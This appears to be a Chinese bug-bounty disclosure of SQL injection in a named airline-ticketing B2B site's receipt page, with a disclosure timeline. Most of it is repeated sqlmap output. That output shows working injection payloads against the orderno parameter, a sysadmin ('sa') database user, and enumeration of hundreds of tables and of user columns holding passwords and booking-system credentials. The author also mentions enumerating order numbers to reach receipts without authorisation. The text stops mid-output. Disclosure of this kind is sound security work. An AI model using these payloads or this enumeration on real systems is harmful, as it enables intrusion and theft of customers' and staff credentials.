2015-06-30: 细节已通知厂商并且等待厂商处理中 2015-07-03: 厂商已经确认,细节仅向厂商公开 2015-07-13: 细节向核心白帽子及相关领域专家公开 2015-07-23: 细节向普通白帽子公开 2015-08-02: 细节向实习白帽子公开 2015-08-17: 细节向公众公开
机票太火 我也想来凑热闹
注入点:http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601sa权限 写shell失败 可执行sql命令 写shell也失败 未授权:http://b2b.89898989.com/reports/printreceipt.aspx?orderno=406032011601orderno参数可控 生成个数字字典 跑一下就OK
sqlmap identified the following injection points with a total of 44 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008available databases [10]:[*] distribution[*] master[*] model[*] msdb[*] tempdb[*] YeeSoHo_4.0[*] YeeSoHo_History[*] YeeSoHo_History2014[*] YeeSoHo_Log[*] YeeSoHo_Log_2015sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current database: 'YeeSoHo_4.0'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: YeeSoHo_4.0[629 tables]+------------------------------------------+| AccountDetailsView || AccountLogView || Change_SubsOrderNo_BK || CustomerOperatorLogView || D99_CMD || D99_REG || D99_Tmp || MSpeer_conflictdetectionconfigrequest || MSpeer_conflictdetectionconfigresponse || MSpeer_lsns || MSpeer_originatorid_history || MSpeer_request || MSpeer_response || MSpeer_topologyrequest || MSpeer_topologyresponse || MSpub_identity_range || Sheet1$ || T_AT_AgentInfo_B2B || T_AT_Logs || T_AT_OrderFlights || T_AT_OrderPassengers || T_AT_PlatFormConfig || T_AT_Syspara || T_AT_Tickets || T_AT_WatingList || T_AT_WatingList_bak || T_Agent_Users || T_Approve_Detail || T_Approve_Flow || T_Approve_Rule || T_Approve_RuleDetail || T_Arrive || T_Arrive_City || T_Arrive_province || T_BSP_Contrast || T_CODE_AIRCRAFTS || T_CODE_AIRPORTS || T_CODE_AirportTerminal || T_CODE_CARRIERS || T_CODE_CITY || T_CODE_COUNTRY || T_CODE_FDINFO || T_CUSTOMER_Address || T_CUSTOMER_Card || T_CUSTOMER_IdentityCard || T_CUSTOMER_PSR || T_CUSTOMER_PSR_BF || T_CUSTOMER_SERVICE || T_CUSTOMER_TELCODE || T_CUSTOMER_TELCODE_BAK || T_CUSTOMER_VISIT || T_CW_AccountLogs || T_CW_Accounts || T_CW_AcountDetails || T_CW_ApplyFillMoney || T_CW_ApplyFillMoney_PZ || T_CW_ApplyFillMoney_bak || T_CW_ApplyFillMoney_old || T_CW_CompanyInfo || T_CW_ContactCompany || T_CW_FreezeMoney || T_CW_MaterialType || T_CW_OrderUpload || T_CW_OrderUploadSearch || T_CW_Settlement || T_CW_UploadSubjects || T_CacheTable_HotCityPrice || T_CacheTable_PAT || T_Code_CarrierCustomer || T_Code_Customers || T_Code_FuelTax || T_Code_OverstepPriceReason || T_Code_PayRcvAccounts || T_Code_PayType || T_Code_Psg || T_Code_SettlementType || T_Common_Logs || T_Complaint_Analyse || T_Complaint_Base || T_Complaint_Check || T_Complaint_Modi || T_Complaint_Reply || T_Complaint_Satisfaction || T_Complaint_Settle || T_Complaint_Type || T_CustomerWebSites || T_Customer_Default || T_Customer_DefaultValues || T_Customer_Info || T_Customer_Phone_OpenScreen || T_Customer_Record_U || T_DR_funds || T_DR_start || T_Distributor_Department || T_Distributor_Info || T_Distributor_User || T_Distributor_User_20150303 || T_Distributor_User_bak || T_DownAvTasks || T_FAQ_Content || T_FAQ_KeyContent || T_FAQ_Keys || T_FAQ_Type || T_Finance_CollectReconciliat || T_Finance_ReconciliatAndOrder || T_Flow_Audit || T_Flow_AuditDetail || T_Flow_CustomerAuditDetail || T_Flow_Orders || T_Framework_Menu || T_Hotel || T_Hotel_Order || T_Hotel_OrderComments || T_Hotel_OrderContac || T_Hotel_OrderCreditCard || T_Hotel_OrderInDetail || T_Hotel_OrderInPerson || T_Hotel_OrderOperater || T_Hotel_Platform || T_Hotel_Room || T_Info || T_Info_R_Group || T_Info_Read || T_Info_Type || T_Info_TypeName || T_KH_AccountPeriod || T_KH_CustomerBalanceInfo || T_KH_CustomerIntegral || T_KH_CustomerLogs || T_KH_CustomerProvider || T_KH_Customers || T_KH_Echo_Customers_ContactPhones_Import || T_KH_Echo_Customers_Import || T_KH_Echo_Customers_Passengers || T_KH_FrequentFlyerAccount || T_KH_IntegralAccount || T_KH_IntegralWaitingList || T_KH_OrganizeCode || T_KH_OrganizeCodeRule || T_KH_Payment_Fee || T_KH_PendingIntegral || T_KH_RevAccounts || T_Log_AllUserLogs || T_Log_CallOn || T_Log_Report || T_Log_Saas || T_Logs_FlightSearch || T_Logs_FlightSearchCost || T_Logs_HX || T_Logs_JT || T_Logs_KoPu || T_Logs_PayPwd || T_Logs_UserLogin || T_Logs_Yeego || T_Member_Users || T_ModelPopupList || T_Msg_Content || T_Msg_Content_News || T_Msg_NotifyList || T_Msg_Subscribe || T_Msg_Type || T_Msg_UserHistory || T_Msg_UserHistory_News || T_News || T_News_Content || T_News_Module || T_Order_Banks || T_Order_PaymentGateway || T_Order_PaymentLog || T_Order_Payments || T_Order_ReturnOrder || T_Order_WaitingTasks || T_PNR_Info || T_PNR_Logs || T_POINTS_Consume || T_POINTS_GOODS_RULES || T_POINTS_GOODS_Storage || T_POINTS_RULES || T_POINTS_SERVICE || T_P_RolePermission || T_PaymentGP_Log || T_Plan_AvCache || T_Platform_GetPolicy_Result || T_Points_Log || T_PolicyUnion_FlightRoute || T_Price_AirProduct_Details || T_Price_AirProducts || T_Price_Base || T_Price_BaseClass || T_Price_CPPolicy || T_Price_Endorsement || T_Price_Gourp_DisplaySetting || T_Price_Group || T_Price_KWPolicy || T_Price_Logs || T_Price_Out || T_Price_Out_2015_06_08 || T_Price_Out_AirLineDetail || T_Price_Out_Detail || T_Price_Out_Detail_20141013 || T_Price_Out_Detail_2015_06_08 || T_Price_Out_Special || T_Price_Out_Special_20141013 || T_Price_Out_back || T_Price_Out_backDif_CR || T_Price_Out_bak_20141013 || T_Price_Policy || T_Price_PolicyBase || T_Price_PolicyBaseGroup || T_Price_Protocol || T_Price_R_Dep_Group || T_Price_R_Dep_Group_Log || T_Price_R_KWPolicy_Group || T_Price_R_Protocol_Group || T_Price_SpecialClass || T_Price_SubDealerDeuctPoint || T_Price_SubDealerRegion || T_Product_PackageDetail || T_Product_Packages || T_PublicInfos || T_Q_Handle_Log || T_Q_NotifyList || T_Q_Receive || T_Q_Receive_Details || T_Q_Receive_Details_Content || T_R_Department_User || T_R_Role_Fuction || T_R_Role_User || T_Report || T_ReportList || T_ReportModel || T_ReportModelDropDownList || T_ReportModelList || T_Report_Role_Function || T_Report_User_ReportFunction || T_Report_User_Role || T_Rpt_AccountDaily || T_Rpt_ConsumerAnalyse || T_Rpt_DomTktSalesCollect || T_Rpt_EmployeePerformance || T_Rpt_GathingStat || T_Rpt_ProfitCollect || T_Rpt_ReportTask || T_Rpt_SearchGathing || T_SMS_ApplyRechange || T_SMS_BirthdayRecords || T_SMS_ESBLOG || T_SMS_KeywordType || T_SMS_Keywords || T_SMS_RelationOfAgentAndSMSTemplate || T_SMS_RelationOfSMSTypeAndAgent || T_SMS_RelationOfSMSTypeAndCustomers || T_SMS_RelationOfSMSTypeAndKeywordType || T_SMS_SMSSendRecords || T_SMS_SMSTemplate || T_SMS_Type || T_SYS_BaseTypes || T_SYS_CARRIERS || T_SYS_CITY || T_SYS_InsuranceConfig || T_SYS_PNRPhoneFormat || T_SYS_Paras || T_SYS_PlatFormConfig || T_SYS_Promotion || T_SendMessage || T_Sum_Day || T_Sum_Detail || T_Sys_BaseType || T_Sys_BaseTypeNames || T_Sys_CusRegisterOpt || T_Sys_Error || T_Sys_Gds_Context || T_Sys_Holiday || T_Sys_Log || T_Sys_Notice || T_Sys_Online || T_Sys_PID || T_Sys_Para || T_Sys_ParamType || T_Sys_Payment || T_Sys_PaymentFee || T_Sys_PlatCodeMapping || T_Sys_PlatFormConfig_B2B || T_Sys_PrintAddr || T_Sys_ServerConfig || T_Sys_Server_Log || T_Sys_Services_Log || T_Sys_Switch || T_Team_Account || T_Team_Customer || T_Team_Log || T_Team_Passenger || T_Team_Plan || T_Team_Rule || T_Team_TravelRoute || T_Team_WarningMonitor || T_Team_WarningSetUp || T_Test || T_Tkt_Ask || T_Tkt_Detr_Lists || T_Tkt_Detr_Payments || T_Tkt_InStore || T_Tkt_Invalid || T_Tkt_Log || T_Tkt_OutStore || T_Tkt_Refund || T_Tkt_Stockpile || T_Tkt_Stockpile_BK || T_Tkt_Store || T_Tkt_Types || T_Tour || T_Upgrade_Function || T_User || T_User_20150303 || T_User_Department || T_User_Error || T_User_Fuction || T_User_Jobs || T_User_Msg || T_User_Role || T_User_Role_Fuction || T_User_Role_User || T_WorkOrder || T_YG_ReceiveOrders || T_YSTA_CusLevel_PriceGroup || T_YSTA_IPAllow || T_YSTA_Logs || T_YSTA_Logs_bk20130109 || T_YW_AccountPeriodBills || T_YW_AirOrders || T_YW_AirTickets || T_YW_AirTiketsSearch || T_YW_AirTiketsSearch_FOR_Excel || T_YW_ApplyMoney || T_YW_Bills || T_YW_ChangeTKTLog || T_YW_InterFlights || T_YW_OrderChangeDetails || T_YW_OrderDispatch || T_YW_OrderEffect || T_YW_OrderEndorsement || T_YW_OrderFlights || T_YW_OrderInsurance || T_YW_OrderInsurance_Logs || T_YW_OrderLogs || T_YW_OrderLogsEx || T_YW_OrderLogs_Client || T_YW_OrderPlatform || T_YW_OrderPlatform_Refund || T_YW_OrderPnrs || T_YW_OrderStatus || T_YW_OrderTickets || T_YW_OrderTickets_BAK || T_YW_Orders || T_YW_Ordertickets_CurSupplierMoney || T_YeeFare_Logs || T_Yeefare_PatTriggerNFDLog || T_customer_psr_bak || V4_Approve_Rule || V4_CW_AcountDetails || V4_CW_ContactCompanySearch || V4_CW_RPT_PartSellSummary || V4_CW_RPT_PaymentsList || V4_CW_RPT_PaymentsList_New || V4_CW_RPT_PaymentsList_New_Ex || V4_CW_RPT_PaymentsList_Normal || V4_CW_RPT_SalesDay || V4_CW_RPT_SalesSummary || V4_CW_Receivables || V4_CW_ZQReceivables || V4_Code_OverstepPriceReason || V4_Distributor_User || V4_KH_Payment_Fee || V4_KH_Price_Group || V4_Price_Group || V4_Product_PackageDetail || V4_RPT_Bills || V4_RPT_CusMangerPerformanceDetial || V4_RPT_CusMangerPerformanceSummary || V4_RPT_DisOrderSearch || V4_RPT_FltStat || V4_RPT_FltStatEx || V4_RPT_OrderSearch || V4_RPT_PassengerTrace || V4_RPT_SaleDay || V4_RPT_SalesReport || V4_RPT_SalesReport1 || V4_RPT_TicketMan_Carrier || V4_RPT_TicketMan_PrintAddr || V4_RPT_UnCompletedOrders || V4_Rpt_AccountDaily || V4_Rpt_AirTicketSearch || V4_Rpt_Distributor_Psr || V4_Rpt_LinkerLoginID || V4_SYS_InsueanceConfig || V4_SubDealAgentGainFlow || V4_SubDealAgentGainFlow_Tkt || V4_SubDealers || V4_YSTA_QueryOrderList || V4_YW_AccountPeriod || V4_YW_AirTiketsSearch || V4_YW_AirTiketsSearch_FOR_Excel || V4_YW_AssignTkt || V4_YW_CarrierAirTkcketSearch || V4_YW_CashRegisterList || V4_YW_ChannelOrder || V4_YW_ChannelOrder1 || V4_YW_ClerkCollect || V4_YW_CustomerManageOrders || V4_YW_EndDateRPT || V4_YW_GathingStat || V4_YW_GathingStat_New || V4_YW_NewOrderSearch || V4_YW_OrderPlatform || V4_YW_OrderTotalFee || V4_YW_OrderTotalFee_BX || V4_YW_OrdersQuery || V4_YW_OrdersQueryByNoEx || V4_YW_OrdersQueryByPsrNameEx || V4_YW_OrdersSearch || V4_YW_OrdersSearch_Normal || V4_YW_OrdersSearch_Simple || V4_YW_OtherOrderList || V4_Ysta_DailyReport || V4_Ysta_DistributorUser || V4_Ysta_SubsOrderNo || V_CW_Accounts || V_CW_ApplyFillMoney || V_CW_CollectionDetails || V_CW_CollectionTickets || V_CW_FillMoneyDetails || V_CW_FreezeMoney || V_CW_FreezeMoneyList || V_CW_OrderUpload || V_CW_OrderUploadSearch || V_CW_OweList || V_CW_PayList || V_CW_PrePayList || V_Distributor_AllConpleteOrder || V_Distributor_RefundOrderSearch || V_Distributor_SubsorderSearch || V_Dpt_Distributor || V_FAQ_Content || V_HotelOrderConfirm || V_Info_Dep_Info || V_KH_CUSTOMER_PSRTELECODE || V_KH_CallTelList || V_KH_Cus_Air_Order_Payments || V_KH_CustomerBalanceInfo || V_KH_CustomerBaseType || V_KH_CustomerPointType || V_KH_CustomerProvider || V_KH_CustomerProvider_ForProvider || V_KH_Customer_Audit || V_KH_Customers_Accounts || V_KH_Customers_AccountsEx || V_KH_Customers_AccountsEx1 || V_KH_Customers_OwnDep || V_KH_Customers_Phone || V_KH_Customers_Psr || V_KH_Customers_Psr_TelCode || V_KH_IntegralAccount || V_KH_PointsDetailsSearch || V_KH_Psg_CarrierCustomerNo || V_Msg_Content || V_Msg_Content_News || V_Msg_News || V_Msg_Subscribe || V_Msg_UserHistory || V_Msg_UserHistory_And_YW_OrderLogs || V_OrderDetail_Log || V_Order_Payment || V_Order_PaymentsLog || V_POINTS_GOODS_RULES_Storage || V_Price_Base || V_Price_BaseClass || V_Price_BaseEx || V_Price_Base_Execl || V_Price_Client || V_Price_ClientFORExport || V_Price_Dep_Group || V_Price_Endorsement || V_Price_Group || V_Price_Group_Protocol || V_Price_Out || V_Price_Out_Client || V_Price_Out_Detail || V_Price_Out_Group || V_Price_Out_Search || V_Price_Protocol || V_Price_SpecialClass || V_Q_Msg_Detail || V_RPT_AffixFeeSta || V_RPT_AirOrders || V_RPT_AirTickets || V_RPT_FBCus || V_RPT_FirstFlight || V_RPT_FltStat || V_RPT_ObsolescentDetail || V_RPT_OrderPNRs || V_RPT_RefundAirOrders || V_RPT_RefundDetail || V_RPT_RefundDetail_Ex || V_RPT_RefundDetail_TktNo || V_RPT_RevokeAirOrders || V_RPT_RevokeTickets || V_RPT_SaleRpt_Order || V_RPT_XLREPORT || V_RPT_XLREPORTEx || V_RPT_XLREPORTNoCase || V_RPT_XLREPORTSimple || V_RTP_SerialNoStatus || V_RoleUser || V_Rpt_AccountStat || V_Rpt_Static_DaySale || V_Rpt_Static_MonthSale || V_SYS_PrintAddr || V_Sys_Gds_Context || V_TJ_OrderTypeStatistic || V_TJ_TicketSellStatForCarrier || V_TJ_TicketSellStatistic || V_T_YW_PaymentDetailsExecl || V_Tkt_Ask || V_Tkt_Ask_Outstore || V_Tkt_Log || V_Tkt_Store || V_Tkt_Sum_Store || V_USER_Department_CusName || V_User || V_User_Agent || V_User_All_Union || V_User_Department || V_User_Distributor || V_User_Login || V_User_Role_Func || V_VIP_TelList || V_WorkOrder || V_YH_QueryGetDepFromGID || V_YH_QueryGetDepFromGID_New || V_YSTA_Logs || V_YW_AccountPeriodBills || V_YW_AirOrders || V_YW_AirOrdersAccountSummary || V_YW_Arrearage || V_YW_ArrearageEx || V_YW_ArrearageSum || V_YW_AssignTkt || V_YW_AssignTkt2 || V_YW_BillOrders || V_YW_Bills || V_YW_BillsCheckage || V_YW_Bills_Ex || V_YW_DetailAccount || V_YW_GathingDetails || V_YW_GathingStat || V_YW_NotDepartureOrderNos || V_YW_NotDepartureOrders || V_YW_OrdFirstFlight || V_YW_OrdFirstPsr || V_YW_OrderAirTickes || V_YW_OrderPnrs_FirstPnr || V_YW_OrderQuery_Gathing || V_YW_OrderTickets || V_YW_OrderTickets_IsExist || V_YW_OrderTickets_IsExist_Group || V_YW_Order_Bills || V_YW_OrdersBalance || V_YW_OrdersBalanceEx || V_YW_OrdersBalance_Rpt || V_YW_OrdersQuery || V_YW_OrdersQueryByNo || V_YW_OrdersQueryByNoEx || V_YW_OrdersQueryByPNR || V_YW_OrdersQueryByPsrName || V_YW_OrdersQueryByPsrNameEx || V_YW_OrdersQueryByTktNo || V_YW_OrdersQuery_CusName || V_YW_OrdersQuery_D || V_YW_OrdersQuery_D_Ex1 || V_YW_OrdersQuery_D_Test || V_YW_OrdersQuery_Ex || V_YW_OrdersQuery_Pnrs || V_YW_Passengers || V_YW_PaymentBills || V_YW_PaymentTypeMoney || V_YW_Payments || V_YW_PaymentsEx || V_YW_PaymentsSearch || V_YW_RefundAirOrders || V_YW_RefundAirOrders2 || V_YW_RefundAirOrdersAccountSummary || V_YW_RefundBalance || V_YW_RegulateAccountSummary || V_YW_RegulateOrders || V_YW_RevokeAirOrders || V_YW_RevokeBalance || V_YW_SubsOrders || V_YW_SubsOrdersAndOrders || V_YW_SubsOrdersAndPnrs || V_YW_SubsOrders_CusName || V_YW_SubsOrders_FirstPnr || V_YW_TiktonHoldOrDischarge || V_YW_TktPrint_SoldEvidence || V_YW_TktPrint_SoldEvidence_LastVersion || V_YW_TktPrint_Tickets || banlg || dtproperties || syncobj_0x3031323831333239 || syncobj_0x3042323033383533 || syncobj_0x3637364532303638 || syncobj_0x3639363843373746 || syncobj_0x3734453641353641 || syncobj_0x3838314533394145 || syncobj_0x4642353139433838 || sysarticlecolumns || sysarticles || sysarticleupdates || sysdiagrams || sysextendedarticlesview || syspublications || sysreplservers || sysschemaarticles || syssubscriptions || systranschemas || t_createperson || t_tkt_store_Backup || v4_Price_Preview || v4_SAgentGain_Info || v_rpt_saleday |+------------------------------------------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008database management system users [6]:[*] ##MS_PolicyEventProcessingLogin##[*] ##MS_PolicyTsqlExecutionLogin##[*] ReplicationYeesoho[*] sa[*] yeesohosqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008current user: 'sa'sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: YeeSoHo_4.0Table: V_User[11 columns]+------------+----------+| Column | Type |+------------+----------+| Level | int || CallSeatNo | varchar || CustomerNo || IsLogout | char || LogName | varchar || NoValidDt | datetime || Pwd | varchar || Remark || UpDepID | int || UserName | varchar || UserType | varchar |+------------+----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: YeeSoHo_4.0Table: V_User[22 columns]+---------------+----------+| Column | Type |+---------------+----------+| Level | int || CallSeatNo | varchar || CustomerNo | varchar || DepCustomerNo | varchar || DepID | int || DepName | varchar || Email | varchar || EtermPort | char || EtermPwd | varchar || EtermServer | varchar || EtermUser | varchar || HasValid | char || ID | int || IsLogout | char || LogName | varchar || NoValidDt | datetime || Pwd | varchar || Remark | varchar || Tel | varchar || UpDepID | int || UserName | varchar || UserType | varchar |+---------------+----------+Database: YeeSoHo_4.0+------------+---------+| Table | Entries |+------------+---------+| dbo.V_User | 1318 |+------------+---------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT (CASE WHEN (1880=1880) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(58) CHAR(103) CHAR(114) CHAR(120) CHAR(58))) AND 'UfkW'='UfkW Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase AND time-based blind (heavy query) Payload: orderno=406032011601' AND 7100=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sys3,sysusers AS sys4,sysusers AS sys5,sysusers AS sys6,sysusers AS sys7) AND 'sNNo'='sNNo---web server operating system: Windows 2008web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727back-end DBMS: Microsoft SQL Server 2008Database: YeeSoHo_4.0Table: V4_Ysta_SubsOrderNo[70 columns]+------------------+-----------+| Column | Type |+------------------+-----------+| AcceptSt | char || Address | nvarchar || AirLines | varchar || ArrivalDate | varchar || AuditingDt | datetime || AuditingMan | varchar || AuditingSt | char || BalanceMoney | money || BelongCustomer | int || BoardPoint | varchar || BookingMan | varchar || Carrier | varchar || Carriers | varchar || CheckSt | char || CreateDt | datetime || CustomerName | varchar || CustomerNo | varchar || CustomerType | char || DealDepID | int || DepartureDt | datetime || DepID | int || DepType | char || DiffDt | int || FlowStatus | char || FlowStep | varchar || FltDate | varchar || FltDateTime | datetime || Gain | money || GathingDt | datetime || GathingMan | varchar || GathingSt | char || InsMoney | money || InsNetPrice | money || InvoinceMoney | float || InvoinceTitle | nvarchar || IsCancel | char || IsDomc | char || IsSelected | int || LinkerID | nvarchar || ModifyDt | datetime || ModifyTag | timestamp || NetPrice | money || OffPoint | varchar || OID | int || OpID | varchar || OrderNo | varchar || OrderSource | varchar || PayType | varchar || PNR | varchar || Pnrs | varchar || PointGain | money || PrintAddr | varchar || PrintAddrName | varchar || Prompt | datetime || ProviderCustomer | int || PsrName | nvarchar || RefundSt | varchar || Remark | nvarchar || SalePointID | int || SalePointName | varchar || SalesID | varchar || SendStatus | char || SendTktDepID | int || SendTktDepName | varchar || SendTktsTypeCode | varchar || SubsOrderNo | varchar || SuspendedSt | char || TicketMan | varchar || TicketSt | char || UserID | varchar |+------------------+-----------+sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Place: GETParameter: orderno Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: orderno=406032011601' AND 2984=2984 AND 'whMu'='whMu Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: orderno=406032011601' AND 1880=CONVERT(INT,(CHAR(58) CHAR(99) CHAR(113) CHAR(102) CHAR(58) (SELECT 